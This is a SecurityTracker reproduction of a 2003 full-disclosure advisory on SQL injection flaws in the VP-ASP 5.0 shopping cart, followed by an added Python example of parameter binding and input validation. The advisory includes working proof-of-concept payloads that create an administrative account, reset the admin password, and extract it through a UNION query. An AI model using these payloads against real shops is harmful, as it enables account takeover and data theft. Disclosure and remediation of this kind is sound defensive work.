SecurityTracker.com
Category:  Application (Commerce)  >  VP-ASP
Vendors:  Virtual Programming
VP-ASP Input Validation Flaws in 'shopsearch' and 'shopdisplayproducts' Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1008351
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Dec 2 2003
Impact:  Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Exploit Included:  Yes
Vendor Confirmed:  Yes
Advisory:  S-Quadra Security Research
Version(s): 5.0
Description:  Several input validation vulnerabilities were reported in the VP-ASP shopping cart software. A remote user can execute arbitrary commands on the target system.

S-Quadra reported that there are SQL injection flaws in 'shopsearch.asp' and 'shopdisplayproducts.asp'.

It is reported that the 'shopsearch.asp' script does not validate or filter user-supplied input before using the input as part of an SQL query. A remote user can submit a specially crafted query to execute commands with administrative privileges, such as adding a new user account. A remote user may also be able to execute arbitrary commands.

It is also reported that a remote user can inject SQL commands via the 'shopdisplayproducts.asp' script. A remote user can read arbitrary information from the database.

Some demonstration exploit examples are provided in the Source Message.

The vendor was reportedly notified on November 28, 2003.

Impact:  A remote user can execute arbitrary commands on the target system with the privileges of the target web server.
Solution:  The vendor has released a fix, available at:

http://www.vpasp.com/virtprog/info/faq_securityfixes.htm

Vendor URL:  www.vpasp.com/
Cause:  Input validation error
Underlying OS:  Windows (Any)
Reported By:  S-Quadra Security Research <research@s-quadra.com>
Message History:   None.


 Source Message Contents

Date:  Mon, 01 Dec 2003 16:15:53 +0300
From:  S-Quadra Security Research <research@s-quadra.com>
Subject:  [Full-Disclosure] Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection

 

        S-Quadra Advisory #2003-11-28

Topic: Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection Vulnerabilities
Severity: Average
Vendor URL: http://www.vpasp.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20031128.txt
Release date: 28 Nov 2003


 1. DESCRIPTION

Virtual Programming VP-ASP is a shopping cart application for e-commerce enabled sites.
It is written in ASP, supports the following databases: Access, MSSQL, MYSQL
on Windows and MYSQL on Unix.

VP-ASP suffers from SQL injection vulnerabilities, which may allow an attacker
in some cases to gain administrative access to the installed VP-ASP Shopping Cart software
or execute arbitrary commands on a target's system.

 2. DETAILS

 -- Vulnerability 1: SQL Injection vulnerability in 'shopsearch.asp' script

An SQL Injection vulnerability has been found in the shopsearch.asp script.
User supplied input is not filtered before being used in a SQL query. Consequently,
query modification using malformed input is possible. Exploitation of the vulnerability
allows a remote attacker to insert a new user with administrative privileges.
A more sophisticated exploitation would allow a remote attacker to execute arbitrary commands
on a target's system (via MSSQL xp_cmdshell() function for example).

 -- PoC code 1:

 Platform: Win32/MSSQL

Posting this data to shopsearch.asp creates new administrative account

Keyword=&category=5); insert into tbluser (fldusername) values 
('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where 
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where 
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

Posting this data to shopsearch.asp changes admin password

Keyword=&category=5); update tbluser set fldpassword='edsaqw' where 
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

 -- Vulnerability 2: SQL Injection vulnerability in 'shopdisplayproducts.asp' script

An SQL Injection vulnerability has been found in the shopdisplayproducts.asp script.
Exploitation of the vulnerability will allow a remote attacker to read any information from a database.

 -- PoC code 2:

Platform: Win32/MSSQL

http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

changing value at the end of request
%20'a%25'--
%20'b%25'--
%20'c%25'--
...
and looking through the HTTP response from VP-ASP web server attacker can find the admin password.

 3. FIX INFORMATION

S-Quadra alerted VP-ASP development team to this issue on 28th November 2003.
Security fixes from VP-ASP development team available at
http://www.vpasp.com/virtprog/info/faq_securityfixes.htm

 4. CREDITS

Nick Gudov <cipher@s-quadra.com> is responsible for discovering this issue.

 5. ABOUT

S-Quadra offers services in computer security, penetration testing and network assessment,
web application security, source code review and third party product vulnerability assessment,
forensic support and reverse engineering.
Security is an art and our goal is to bring responsible and high quality security
service to the IT market, customized to meet the unique needs of each individual client.

S-Quadra, (pronounced es quadra), is not an acronym.
It's unique, creative and innovative - just like the security services we bring to our clients.

S-Quadra Advisory #2003-11-28

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
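The root cause reported above is request input used as SQL text without validation. The following is an added example, not VP-ASP code and not part of the advisory: it contrasts that pattern with a bound parameter for a string field like 'cat' and strict numeric validation for a field like 'category'. Python's sqlite3 stands in for the ASP/MSSQL stack; the products table, the function names and all sample rows are assumptions made for illustration.

```python
import sqlite3

# Constructed input with the same shape as the 'cat' value in PoC 2 (URL-decoded).
SAMPLE_CAT = ("qwerty' union select fldauto,fldpassword from tbluser "
              "where fldusername='admin'--")

def make_db():
    """In-memory database with constructed rows (products layout is assumed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, category TEXT);
        CREATE TABLE tbluser (fldauto INTEGER, fldusername TEXT, fldpassword TEXT);
        INSERT INTO products VALUES (1, 'Mug', 'kitchen'), (2, 'Lamp', 'home');
        INSERT INTO tbluser VALUES (1, 'admin', 'constructed-secret');
    """)
    return db

def products_unsafe(db, cat):
    """Flawed pattern: the request value becomes part of the SQL text."""
    sql = "SELECT id, name FROM products WHERE category = '" + cat + "'"
    return db.execute(sql).fetchall()

def products_safe(db, cat):
    """Hardened pattern: the value is bound as data and never parsed as SQL."""
    sql = "SELECT id, name FROM products WHERE category = ?"
    return db.execute(sql, (cat,)).fetchall()

def parse_category_id(raw):
    """Numeric fields: accept only a short run of ASCII digits, else reject."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("category must be a non-negative integer")
    return int(raw)

if __name__ == "__main__":
    db = make_db()
    print("unsafe:", products_unsafe(db, SAMPLE_CAT))  # row from tbluser leaks
    print("safe:  ", products_safe(db, SAMPLE_CAT))    # no matching category
    try:
        parse_category_id("5); x")
    except ValueError as exc:
        print("rejected:", exc)
```

Validation and parameter binding are complementary: the numeric check rejects malformed requests early, while binding keeps any value that does pass from altering the query structure.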



Copyright 2003, SecurityGlobal.net LLC